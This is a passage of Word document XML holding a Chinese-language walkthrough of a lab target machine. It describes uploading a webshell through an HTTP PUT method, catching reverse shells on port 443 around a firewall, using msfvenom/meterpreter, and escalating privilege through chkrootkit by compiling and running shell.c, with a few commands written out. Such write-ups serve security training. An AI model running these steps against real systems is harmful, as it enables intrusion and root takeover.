            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38" name="图片 51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1" descr="IMG_30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676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="图片 52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2" descr="IMG_30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无法使用wget命令，也可使用scp命令，来获取shell.c文件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c.编译执行shell.c文件，提权成功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cp shell.c /tmp/shell.c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gcc shell.c -o update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./update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1724025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="图片 53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3" descr="IMG_30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209800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="图片 54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4" descr="IMG_30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bookmarkStart w:id="20" w:name="t21"/>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（五）防火墙规则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python -c 'import pty; pty.spawn("/bin/bash")'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cd /root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cat newRule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3457575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="图片 55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5" descr="IMG_30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对于入站流量：只接收22、80目的端口，8080、443源端口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对于出站流量：只接收22、80源端口，8080、443目的端口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即，本地端口只允许22和80，外来端口只允许8080和443，用来保证对外部HTTP（s）服务的正常访问</w:t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default"/>
        </w:rPr>
        <w:t>由此，可利用这一点，监听443端口来接收反弹shell（这也验证了之前使用7777端口监听失败的原因）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6850" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37" name="图片 56" descr="IMG_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6" descr="IMG_3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</w:rPr>
        <w:t>成功拿到“伪”flag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</w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1081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bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="t22"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总结：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>1.拿到该靶机，浏览网页没有任何发现，测试其特定目录支持的方法（/test目录支持PUT方法），找到突破口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>2.通过利用PUT方法，上传一句话木马文件，拿到菜刀webshell权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>3.也可通过上传Kali自带的反弹shell脚本文件（php-reverse-shell.php）拿到shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>4.还可以使用msfvenom生成payload，配合msfconsole，触发服务器端反弹TCP，得到一个meterpreter的shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>5.通过对chkrootkit工具存在的本地提权漏洞的利用，使用了两种方法提权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>6.该靶机设置了防火墙策略，相对提高了安全性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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4632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uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11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2020-10-24T06:18:44Z</dcterms:created>
  <dc:creator>94994</dc:creator>
  <cp:lastModifiedBy>94994</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-24T06:20:10Z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